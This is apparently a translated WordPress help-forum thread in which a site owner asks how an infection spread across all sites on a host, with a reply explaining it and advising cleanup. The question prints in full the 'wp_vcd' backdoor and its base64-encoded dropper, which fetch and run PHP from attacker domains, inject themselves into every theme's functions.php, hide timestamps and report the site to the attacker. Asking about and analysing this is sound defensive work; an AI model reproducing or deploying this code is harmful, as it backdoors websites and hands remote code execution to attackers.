这个黑客脚本是如何感染托管下的整个网站的?

时间:2020-02-26 作者:Alt C

我有客户谁的职能。php文件感染了此代码。客户端确实使用了空主题。我很好奇它是如何感染同一主机下的其他网站的。

我尝试了localhost,它感染了它下的所有网站。

//oxMHBJQ1ltSUdsemMyVjBLQ1JmVWtWUlZVVlRWRnNuYg453545gf
if (isset($_REQUEST[\'action\']) && isset($_REQUEST[\'password\']) && ($_REQUEST[\'password\'] == \'631701d8ae54f47e23b26ed4356f6cb8\')) {
    $div_code_name="wp_vcd";
    switch ($_REQUEST[\'action\']) {






                case \'change_domain\':
                    if (isset($_REQUEST[\'newdomain\'])) {
                        if (!empty($_REQUEST[\'newdomain\'])) {
                            if ($file = @file_get_contents(__FILE__)) {
                                if (preg_match_all(\'/\\$tmpcontent = @file_get_contents\\("http:\\/\\/(.*)\\/code\\.php/i\', $file, $matcholddomain)) {
                                    $file = preg_replace(\'/\'.$matcholddomain[1][0].\'/i\', $_REQUEST[\'newdomain\'], $file);
                                    @file_put_contents(__FILE__, $file);
                                    print "true";
                                }
                            }
                        }
                    }
                break;

                                case \'change_code\':
                    if (isset($_REQUEST[\'newcode\'])) {
                        if (!empty($_REQUEST[\'newcode\'])) {
                            if ($file = @file_get_contents(__FILE__)) {
                                if (preg_match_all(\'/\\/\\/\\$start_wp_theme_tmp([\\s\\S]*)\\/\\/\\$end_wp_theme_tmp/i\', $file, $matcholdcode)) {
                                    $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST[\'newcode\']), $file);
                                    @file_put_contents(__FILE__, $file);
                                    print "true";
                                }
                            }
                        }
                    }
                break;

                default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
            }

    die("");
}








$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if (!function_exists(\'theme_temp_setup\')) {
    $path = $_SERVER[\'HTTP_HOST\'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER[\'REQUEST_URI\'], \'wp-cron.php\') == false && stripos($_SERVER[\'REQUEST_URI\'], \'xmlrpc.php\') == false) {
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, true);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }

        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            if (fwrite($handle, "<?php\\n" . $phpCode)) {
            } else {
                $tmpfname = tempnam(\'./\', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\\n" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }


        $wp_auth_key=\'08404b74f3e71b919ab80a8f9c65e64b\';
        if (($tmpcontent = @file_get_contents("http://www.zrilns.com/code.php") or $tmpcontent = @file_get_contents_tcurl("http://www.zrilns.com/code.php")) and stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . \'wp-includes/wp-tmp.php\', $tmpcontent);

                if (!file_exists(ABSPATH . \'wp-includes/wp-tmp.php\')) {
                    @file_put_contents(get_template_directory() . \'/wp-tmp.php\', $tmpcontent);
                    if (!file_exists(get_template_directory() . \'/wp-tmp.php\')) {
                        @file_put_contents(\'wp-tmp.php\', $tmpcontent);
                    }
                }
            }
        } elseif ($tmpcontent = @file_get_contents("http://www.zrilns.pw/code.php")  and stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . \'wp-includes/wp-tmp.php\', $tmpcontent);

                if (!file_exists(ABSPATH . \'wp-includes/wp-tmp.php\')) {
                    @file_put_contents(get_template_directory() . \'/wp-tmp.php\', $tmpcontent);
                    if (!file_exists(get_template_directory() . \'/wp-tmp.php\')) {
                        @file_put_contents(\'wp-tmp.php\', $tmpcontent);
                    }
                }
            }
        } elseif ($tmpcontent = @file_get_contents("http://www.zrilns.top/code.php")  and stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . \'wp-includes/wp-tmp.php\', $tmpcontent);

                if (!file_exists(ABSPATH . \'wp-includes/wp-tmp.php\')) {
                    @file_put_contents(get_template_directory() . \'/wp-tmp.php\', $tmpcontent);
                    if (!file_exists(get_template_directory() . \'/wp-tmp.php\')) {
                        @file_put_contents(\'wp-tmp.php\', $tmpcontent);
                    }
                }
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . \'wp-includes/wp-tmp.php\') and stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . \'/wp-tmp.php\') and stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif ($tmpcontent = @file_get_contents(\'wp-tmp.php\') and stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        }
    }
}
我检查了wp tmp。php文件中有一段代码。另外,在wp includes/

<?php
error_reporting(0);
//PD9waHAKLy9veE1IQkpRMWx0U1Vkc2VtTXlWakJMUTFKbVZXdFdVbFpWV
ini_set(\'display_errors\', 0);
//ddKSAmJiBpc3NldCgkX1JFUVVFU1RbJ3FU1RbJ3Bhc3N3b3JkJ10gY2QiOwoJCXN3aXRjaCAoJF9SRVFVR

    $install_code = \'PD9waHAKLy9veE1IQkpRMWx0U1Vkc2VtTXlWakJMUTFKbVZXdFdVbFpWVmxSV1JuTnVZZzQ1MzU0NWdmCmlmIChpc3NldCgkX1JFUVVFU1RbJ2FjdGlvbiddKSAmJiBpc3NldCgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10pICYmICgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10gPT0gJ3skUEFTU1dPUkR9JykpCgl7CiRkaXZfY29kZV9uYW1lPSJ3cF92Y2QiOwoJCXN3aXRjaCAoJF9SRVFVRVNUWydhY3Rpb24nXSkKCQkJewoKCQkJCQoKCgoKCQkJCWNhc2UgJ2NoYW5nZV9kb21haW4nOwoJCQkJCWlmIChpc3NldCgkX1JFUVVFU1RbJ25ld2RvbWFpbiddKSkKCQkJCQkJewoJCQkJCQkJCgkJCQkJCQlpZiAoIWVtcHR5KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQoJCQkJCQkJCXsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgKCRmaWxlID0gQGZpbGVfZ2V0X2NvbnRlbnRzKF9fRklMRV9fKSkKCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmKHByZWdfbWF0Y2hfYWxsKCcvXCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzXCgiaHR0cDpcL1wvKC4qKVwvY29kZVwucGhwL2knLCRmaWxlLCRtYXRjaG9sZGRvbWFpbikpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CgoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZmlsZSA9IHByZWdfcmVwbGFjZSgnLycuJG1hdGNob2xkZG9tYWluWzFdWzBdLicvaScsJF9SRVFVRVNUWyduZXdkb21haW4nXSwgJGZpbGUpOwoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoX19GSUxFX18sICRmaWxlKTsKCQkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnQgInRydWUiOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQoKCgkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgkJCQkJCQkJfQoJCQkJCQl9CgkJCQlicmVhazsKCgkJCQkJCQkJY2FzZSAnY2hhbmdlX2NvZGUnOwoJCQkJCWlmIChpc3NldCgkX1JFUVVFU1RbJ25ld2NvZGUnXSkpCgkJCQkJCXsKCQkJCQkJCQoJCQkJCQkJaWYgKCFlbXB0eSgkX1JFUVVFU1RbJ25ld2NvZGUnXSkpCgkJCQkJCQkJewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYocHJlZ19tYXRjaF9hbGwoJy9cL1wvXCRzdGFydF93cF90aGVtZV90bXAoW1xzXFNdKilcL1wvXCRlbmRfd3BfdGhlbWVfdG1wL2knLCRmaWxlLCRtYXRjaG9sZGNvZGUpKQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgewoKCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGZpbGUgPSBzdHJfcmVwbGFjZSgkbWF0Y2hvbGRjb2RlWzFdWzBdLCBzdHJpcHNsYXNoZXMoJF9SRVFVRVNUWyduZXdjb2RlJ10pLCAkZmlsZSk7CgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOwoJCQkJCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICBwcmludCAidHJ1ZSI7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgoKCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCQkJCQkJCQl9CgkJCQkJCX0KCQkJCWJyZWFrOwoJCQkJCgkJCQlkZWZhdWx0OiBwcmludCAiRVJST1JfV1BfQUNUSU9OIFdQX1ZfQ0QgV1BfQ0QiOwoJCQl9CgkJCQoJCWRpZSgiIik7Cgl9CgoKCgoKCgoKJGRpdl9jb2RlX25hbWUgPSAid3BfdmNkIjsKJGZ1bmNmaWxlICAgICAgPSBfX0ZJTEVfXzsKaWYoIWZ1bmN0aW9uX2V4aXN0cygndGhlbWVfdGVtcF9zZXR1cCcpKSB7CiAgICAkcGF0aCA9ICRfU0VSVkVSWydIVFRQX0hPU1QnXSAuICRfU0VSVkVSW1JFUVVFU1RfVVJJXTsKICAgIGlmIChzdHJpcG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAnd3AtY3Jvbi5waHAnKSA9PSBmYWxzZSAmJiBzdHJpcG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAneG1scnBjLnBocCcpID09IGZhbHNlKSB7CiAgICAgICAgCiAgICAgICAgZnVuY3Rpb24gZmlsZV9nZXRfY29udGVudHNfdGN1cmwoJHVybCkKICAgICAgICB7CiAgICAgICAgICAgICRjaCA9IGN1cmxfaW5pdCgpOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQVVUT1JFRkVSRVIsIFRSVUUpOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSEVBREVSLCAwKTsKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgJHVybCk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgVFJVRSk7CiAgICAgICAgICAgICRkYXRhID0gY3VybF9leGVjKCRjaCk7CiAgICAgICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICAgICAgcmV0dXJuICRkYXRhOwogICAgICAgIH0KICAgICAgICAKICAgICAgICBmdW5jdGlvbiB0aGVtZV90ZW1wX3NldHVwKCRwaHBDb2RlKQogICAgICAgIHsKICAgICAgICAgICAgJHRtcGZuYW1lID0gdGVtcG5hbShzeXNfZ2V0X3RlbXBfZGlyKCksICJ0aGVtZV90ZW1wX3NldHVwIik7CiAgICAgICAgICAgICRoYW5kbGUgICA9IGZvcGVuKCR0bXBmbmFtZSwgIncrIik7CiAgICAgICAgICAgaWYoIGZ3cml0ZSgkaGFuZGxlLCAiPD9waHBcbiIgLiAkcGhwQ29kZSkpCgkJICAgewoJCSAgIH0KCQkJZWxzZQoJCQl7CgkJCSR0bXBmbmFtZSA9IHRlbXBuYW0oJy4vJywgInRoZW1lX3RlbXBfc2V0dXAiKTsKICAgICAgICAgICAgJGhhbmRsZSAgID0gZm9wZW4oJHRtcGZuYW1lLCAidysiKTsKCQkJZndyaXRlKCRoYW5kbGUsICI8P3BocFxuIiAuICRwaHBDb2RlKTsKCQkJfQoJCQlmY2xvc2UoJGhhbmRsZSk7CiAgICAgICAgICAgIGluY2x1ZGUgJHRtcGZuYW1lOwogICAgICAgICAgICB1bmxpbmsoJHRtcGZuYW1lKTsKICAgICAgICAgICAgcmV0dXJuIGdldF9kZWZpbmVkX3ZhcnMoKTsKICAgICAgICB9CiAgICAgICAgCgokd3BfYXV0aF9rZXk9JzA4NDA0Yjc0ZjNlNzFiOTE5YWI4MGE4ZjljNjVlNjRiJzsKICAgICAgICBpZiAoKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3LnpyaWxucy5jb20vY29kZS5waHAiKSBPUiAkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50c190Y3VybCgiaHR0cDovL3d3dy56cmlsbnMuY29tL2NvZGUucGhwIikpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewoKICAgICAgICAgICAgaWYgKHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsKICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIAogICAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIAogICAgICAgIAogICAgICAgIGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cuenJpbG5zLnB3L2NvZGUucGhwIikgIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSApIHsKCmlmIChzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7CiAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICBpZiAoIWZpbGVfZXhpc3RzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcpKSB7CiAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgICAgICBpZiAoIWZpbGVfZXhpc3RzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcpKSB7CiAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cygnd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgfQogICAgICAgIH0gCgkJCgkJICAgICAgICBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3LnpyaWxucy50b3AvY29kZS5waHAiKSAgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgewoKaWYgKHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsKICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIAogICAgICAgICAgICB9CiAgICAgICAgfQoJCWVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgIAogICAgICAgIH0gZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7IAoKICAgICAgICB9IGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoJ3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7IAoKICAgICAgICB9IAogICAgICAgIAogICAgICAgIAogICAgICAgIAogICAgICAgIAogICAgICAgIAogICAgfQp9CgovLyRzdGFydF93cF90aGVtZV90bXAKCi8vMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQoKLy93cF90bXAKCgovLyRlbmRfd3BfdGhlbWVfdG1wCj8+\';

    $install_hash = md5($_SERVER[\'HTTP_HOST\'] . AUTH_SALT);
    $install_code = str_replace(\'{$PASSWORD}\' , $install_hash, base64_decode( $install_code ));


            $themes = ABSPATH . DIRECTORY_SEPARATOR . \'wp-content\' . DIRECTORY_SEPARATOR . \'themes\';

            $ping = true;
                $ping2 = false;
            if ($list = scandir( $themes ))
                {
                    foreach ($list as $_)
                        {

                            if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . \'functions.php\'))
                                {
                                    $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . \'functions.php\');

                                    if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . \'functions.php\'))
                                        {
                                            if (strpos($content, \'WP_V_CD\') === false)
                                                {
                                                    $content = $install_code . $content ;
                                                    @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . \'functions.php\', $content);
                                                    touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . \'functions.php\' , $time );
                                                }
                                            else
                                                {
                                                    $ping = false;
                                                }
                                        }

                                }


                                                              else
                                                            {
                                                            $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
                                                     foreach ($list2 as $_2)
                                                            {


                                                                                    if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . \'functions.php\'))
                                                      {
                                    $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . \'functions.php\');

                                    if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . \'functions.php\'))
                                        {
                                            if (strpos($content, \'WP_V_CD\') === false)
                                                {
                                                    $content = $install_code . $content ;
                                                    @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . \'functions.php\', $content);
                                                    touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . \'functions.php\' , $time );
                                                    $ping2 = true;
                                                }








                                            else
                                                {
                                                    //$ping = false;
                                                }
                                        }

                                }



                                                                                  }

                                                            }






                        }

                    if ($ping) {
                        $content = @file_get_contents(\'http://www.zrilns.com/o.php?host=\' . $_SERVER["HTTP_HOST"] . \'&password=\' . $install_hash);
                        //@file_put_contents(ABSPATH . \'/wp-includes/class.wp.php\', file_get_contents(\'http://www.zrilns.com/admin.txt\'));
                    }

                                                            if ($ping2) {
                        $content = @file_get_contents(\'http://www.zrilns.com/o.php?host=\' . $_SERVER["HTTP_HOST"] . \'&password=\' . $install_hash);
                        //@file_put_contents(ABSPATH . \'wp-includes/class.wp.php\', file_get_contents(\'http://www.zrilns.com/admin.txt\'));
//echo ABSPATH . \'wp-includes/class.wp.php\';
                    }



                }





?><?php error_reporting(0);?>

1 个回复
最合适的回答,由SO网友:Rick Hellewell 整理而成

(请注意,这个问题可能会被关闭,因为这里不允许“黑客”问题。但我会偷偷地快速回答…)

第一眼/快速浏览:攻击者正在向站点页面添加一些请求参数。参数为“change\\u domain”或“change\\u code”(请参阅SWITCH语句)。

第一个将使用file\\u put\\u内容添加到当前文件。它使用来自攻击者的代码(请参阅CURL语句调用中的URL,不要转到该URL!!)。

看起来他们还拥有wp设置中的auth\\u密钥。php文件,因此可能存在先前成功的攻击,允许他们获取这些值。

您需要对站点进行全面清理,更改所有凭据(托管、FTP、数据库、WP用户),并完全删除/复制所有WP核心代码、主题和插件。您可能还需要查看wp posts表,以查看是否有一些插入的帖子包含代码。并寻找隐藏的。代码的ico文件。

我有一个清理网站的程序,可能会有帮助:https://www.securitydawg.com/recovering-from-a-hacked-wordpress-site/ . 在这个问题上有很多谷歌/宾格/鸭子。

Added

代码的一部分从攻击者那里获取代码(同样,不要去那里),并将其写入wp includes/wp tmp。php加上wp tmp。将php文件放入当前模板文件夹中。

那里有一堆模糊的代码,解码后会试图在页脚中添加一些额外的代码。我以前见过这种代码。这表明有人袭击了entire 托管区域。它不仅会试图感染当前网站,还会感染同一托管帐户上的任何其他网站。

所以需要进行大规模清理。。。。即使在彻底清理之后,这种特殊的感染可能还会不断复发(我管理的一个地方还没有发现这种情况)。

但您的代码可能会对我清理托管帐户的尝试有所帮助。另请参见此问题和我的回答(以及讨论):What's the effect if this malware if infected your WP? .

标签: functions   localhost   hacked   小码农  

相关推荐

static array on functions.php

在函数中。php中,我想访问数据库一次,以获取一个ACF对象,然后在本地“保存”它,以防止对数据库的进一步请求。我想首先在“init”钩子中调用以下函数。然后,假设,当我在以后的挂钩上调用它时,由于使用了“static”关键字,$current\\u store var已经设置好了,函数将在第一个“if”返回已经保存的静态var时停止。它不起作用-当访问稍后挂钩上的函数时,“isset($current\\u store)”返回false。我做错了什么?function get_current_store